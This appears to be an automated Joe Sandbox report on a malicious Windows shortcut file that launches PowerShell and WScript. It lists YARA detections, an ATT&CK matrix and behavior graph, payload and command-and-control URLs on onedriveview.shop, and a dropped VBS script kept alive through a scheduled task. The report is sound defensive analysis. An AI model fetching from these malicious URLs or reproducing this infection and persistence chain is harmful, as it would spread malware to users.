              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected LonePage
              Source: Yara matchFile source: 0000000C.00000002.1408855210.000001DD69175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1916774143.0000012F1C33F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3716225104.0000019D57E46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1916774143.0000012F1C381000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3716225104.0000019D57E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1917187862.0000012F1C465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1406068158.000001DD68FB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.3765597110.000001BD73D2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1916774143.0000012F1C39A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.3765597110.000001BD73CA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1406068158.000001DD68F77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.3733520219.000001BD00354000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.3733520219.000001BD0008C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3716534823.0000019D580A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1406068158.000001DD68F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2302216870.000002178C0C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2661463505.000001E22AA70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3716225104.0000019D57E17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1318527100.00000219E1904000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3716225104.0000019D57E7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2360286566.00000217A5FE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2661463505.000001E22AABE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2699350373.000001E242BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2658835860.000001E228A20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2661463505.000001E22A735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2360286566.00000217A600F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2699350373.000001E242B60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1916774143.0000012F1C346000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2661463505.000001E22B40C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2303633437.000002178DAE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.3733520219.000001BD0015B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2303633437.000002178F33A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2661463505.000001E22A80C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1318527100.00000219E1578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5904, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7416, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4864, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\Public\Libraries\Libraries.vbs, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected LonePage
              Source: Yara matchFile source: 0000000C.00000002.1408855210.000001DD69175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1916774143.0000012F1C33F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3716225104.0000019D57E46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1916774143.0000012F1C381000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3716225104.0000019D57E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1917187862.0000012F1C465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1406068158.000001DD68FB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.3765597110.000001BD73D2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1916774143.0000012F1C39A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.3765597110.000001BD73CA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1406068158.000001DD68F77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.3733520219.000001BD00354000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.3733520219.000001BD0008C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3716534823.0000019D580A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1406068158.000001DD68F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2302216870.000002178C0C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2661463505.000001E22AA70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3716225104.0000019D57E17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1318527100.00000219E1904000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3716225104.0000019D57E7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2360286566.00000217A5FE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2661463505.000001E22AABE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2699350373.000001E242BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2658835860.000001E228A20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2661463505.000001E22A735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2360286566.00000217A600F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2699350373.000001E242B60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1916774143.0000012F1C346000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2661463505.000001E22B40C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2303633437.000002178DAE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.3733520219.000001BD0015B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2303633437.000002178F33A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2661463505.000001E22A80C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1318527100.00000219E1578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5904, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7416, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4864, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\Public\Libraries\Libraries.vbs, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting              		Valid Accounts1
              Command and Scripting Interpreter              		1
              Scheduled Task/Job              		11
              Process Injection              		11
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		111
              Scripting              		1
              Scheduled Task/Job              		31
              Virtualization/Sandbox Evasion              		LSASS Memory11
              Process Discovery              		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell              		Login HookLogin Hook1
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials22
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1522698 Sample: XnQmVRj5g0.lnk Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 50 Malicious sample detected (through community Yara rule) 2->50 52 Windows shortcut file (LNK) starts blacklisted processes 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 14 other signatures 2->56 8 wscript.exe 1 2->8         started        11 powershell.exe 17 21 2->11         started        15 wscript.exe 2->15         started        17 2 other processes 2->17 process3 dnsIp4 58 Windows shortcut file (LNK) starts blacklisted processes 8->58 60 Suspicious powershell command line found 8->60 62 Wscript starts Powershell (via cmd or directly) 8->62 68 3 other signatures 8->68 19 powershell.exe 8->19         started        46 188.114.97.3 CLOUDFLARENETUS European Union 11->46 42 C:\Users\Public\Libraries\Libraries.vbs, ASCII 11->42 dropped 64 Uses schtasks.exe or at.exe to add and modify task schedules 11->64 66 Found suspicious powershell code related to unpacking or dynamic code loading 11->66 21 Acrobat.exe 69 11->21         started        23 conhost.exe 1 11->23         started        25 schtasks.exe 1 11->25         started        27 powershell.exe 15->27         started        48 127.0.0.1 unknown unknown 17->48 29 powershell.exe 17->29         started        file5 signatures6 process7 process8 31 conhost.exe 19->31         started        33 AcroCEF.exe 108 21->33         started        35 conhost.exe 27->35         started        37 conhost.exe 29->37         started        process9 39 AcroCEF.exe 33->39         started        dnsIp10 44 23.41.168.139 ZAYO-6461US United States 39->44

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              XnQmVRj5g0.lnk32%ReversingLabsScript-PowerShell.Trojan.Pantera
              XnQmVRj5g0.lnk100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://x1.i.lencr.org/0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1334636017.00000219EFB50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1334636017.00000219EFC93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2352737151.000002179DB56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178F547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2352737151.000002179DC99000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.13.drfalse
              • URL Reputation: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.2303633437.000002178DD0E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crl.microsoftpowershell.exe, 0000001B.00000002.2658656150.000001E2289E5000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.2303633437.000002178DD0E000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                https://go.micropowershell.exe, 00000001.00000002.1318527100.00000219E0715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178E70E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22AC1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD0056E000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000010.00000002.2352737151.000002179DC99000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://onedriveview.shop/api/values/82980464243822115700/refresh81/4869132.txtpowershell.exe, 0000001B.00000002.2661463505.000001E22B182000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000010.00000002.2352737151.000002179DC99000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://onedriveview.shop/api/values/82980464243822115700/refresh81/powershell.exe, 00000020.00000002.3768594875.000001BD75680000.00000004.00000020.00020000.00000000.sdmp, Libraries.vbs.1.drtrue
                    		unknown
                    https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000E.00000003.1353549281.000001FC96190000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.14.dr, edb.log.14.drfalse
                      		unknown
                      http://crl.ver)svchost.exe, 0000000E.00000002.2729773734.000001FC96400000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://onedriveview.shop/api/vapowershell.exe, 0000001B.00000002.2661463505.000001E22AB6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD004DC000.00000004.00000800.00020000.00000000.sdmptrue
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.2303633437.000002178DD0E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://onedriveview.shop/api/valpowershell.exe, 0000001B.00000002.2661463505.000001E22B40C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22B1F0000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              https://onedriveview.shop/api/values/82980464243822115700/refresh81/4602718593.txtpowershell.exe, 00000010.00000002.2303633437.000002178F0D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://onedriveview.shoppowershell.exe, 00000001.00000002.1318527100.00000219E1127000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1318527100.00000219E1115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178F1AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178F0D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22B182000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  https://www.adobe.coReaderMessages.9.drfalse
                                    		unknown
                                    https://g.live.com/odclientsettings/Prod1C:edb.log.14.drfalse
                                      		unknown
                                      http://www.microsoft.coipowershell.exe, 00000001.00000002.1343824734.00000219F7E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://crl.micropowershell.exe, 0000001B.00000002.2701840163.000001E242DA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://onedriveview.shop/api/values/view/sklyar.txtpowershell.exe, 00000001.00000002.1318221061.00000219DDCC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1318527100.00000219DFD15000.00000004.00000800.00020000.00000000.sdmp, XnQmVRj5g0.lnktrue
                                            		unknown
                                            https://contoso.com/powershell.exe, 00000010.00000002.2352737151.000002179DC99000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1334636017.00000219EFB50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1334636017.00000219EFC93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2352737151.000002179DB56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178F547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2352737151.000002179DC99000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://onedriveview.shop/api/valuepowershell.exe, 00000001.00000002.1318527100.00000219E1192000.00000004.00000800.00020000.00000000.sdmptrue
                                              		unknown
                                              http://onedriveview.shoppowershell.exe, 00000001.00000002.1318527100.00000219E112D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178F1B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22B1F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://onedriveview.shop/api/values/refresh81powershell.exe, 00000020.00000002.3768594875.000001BD75680000.00000004.00000020.00020000.00000000.sdmp, Libraries.vbs.1.drtrue
                                                  		unknown
                                                  https://onedriveview.shpowershell.exe, 0000001B.00000002.2661463505.000001E22A735000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD0008C000.00000004.00000800.00020000.00000000.sdmptrue
                                                    		unknown
                                                    https://onedriveview.shop/api/values/refresh81Xpowershell.exe, 0000001B.00000002.2661463505.000001E22AB6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD004DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1318527100.00000219DFAE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178DAE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22A6FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22A70E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD0004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD00062000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://onedriveview.shop/api/values/refresh81tesesXpowershell.exe, 00000020.00000002.3733520219.000001BD004DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1318527100.00000219DFAE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178DAE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22A735000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD0004B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://crl.microspowershell.exe, 0000001B.00000002.2701840163.000001E242DA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          188.114.97.3
                                                          		unknownEuropean Union
                                                          		13335CLOUDFLARENETUSfalse
                                                          23.41.168.139
                                                          		unknownUnited States
                                                          		6461ZAYO-6461USfalse

                                                          Private

                                                          IP
                                                          127.0.0.1

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1522698
                                                          Start date and time:2024-09-30 15:36:12 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 7m 38s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:34
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:XnQmVRj5g0.lnk
                                                          renamed because original name is a hash value
                                                          Original Sample Name:b415741b40f9031d1810d06f0bcbcaa0d611c07ccbc3b04828ac779ee9e05a2a.lnk
                                                          Detection:MAL
                                                          Classification:mal100.spre.troj.expl.evad.winLNK@32/53@0/3
                                                          EGA Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 10
                                                          • Number of non-executed functions: 1
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .lnk
                                                          • Override analysis time to 240s for sample based on specific behavior

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 184.28.88.176, 172.64.41.3, 162.159.61.3, 52.5.13.197, 52.202.204.11, 23.22.254.206, 54.227.187.23, 184.28.90.27, 2.23.197.184, 2.16.100.168, 88.221.110.91, 2.19.126.149, 2.19.126.143, 2.22.242.123, 2.22.242.11, 192.168.2.7, 23.200.0.21
                                                          • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                          • Execution Graph export aborted for target powershell.exe, PID 5904 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 7352 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • VT rate limit hit for: XnQmVRj5g0.lnk

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          09:37:10API Interceptor116x Sleep call for process: powershell.exe modified
                                                          09:37:16API Interceptor3x Sleep call for process: svchost.exe modified
                                                          09:37:25API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                          15:37:15Task SchedulerRun new task: ExplorerCoreUpdateTaskMachine path: C:\Users\Public\Libraries\Libraries.vbs

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          188.114.97.3Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.rtprajalojago.live/7vun/
                                                          inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                          • joxi.net/4Ak49WQH0GE3Nr.mp3
                                                          http://meta.case-page-appeal.eu/community-standard/208273899187123/Get hashmaliciousUnknownBrowse
                                                          • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                          9q24V7OSys.exeGet hashmaliciousFormBookBrowse
                                                          • www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
                                                          QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • filetransfer.io/data-package/mfctuvFf/download
                                                          http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                                                          • brawllstars.ru/
                                                          http://aktiivasi-paylaterr.from-resmi.com/Get hashmaliciousUnknownBrowse
                                                          • aktiivasi-paylaterr.from-resmi.com/
                                                          ECChG5eWfZ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          • homker11.uebki.one/GeneratorTest.php
                                                          HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                          • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                                                          QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • filetransfer.io/data-package/Ky4pZ0WB/download
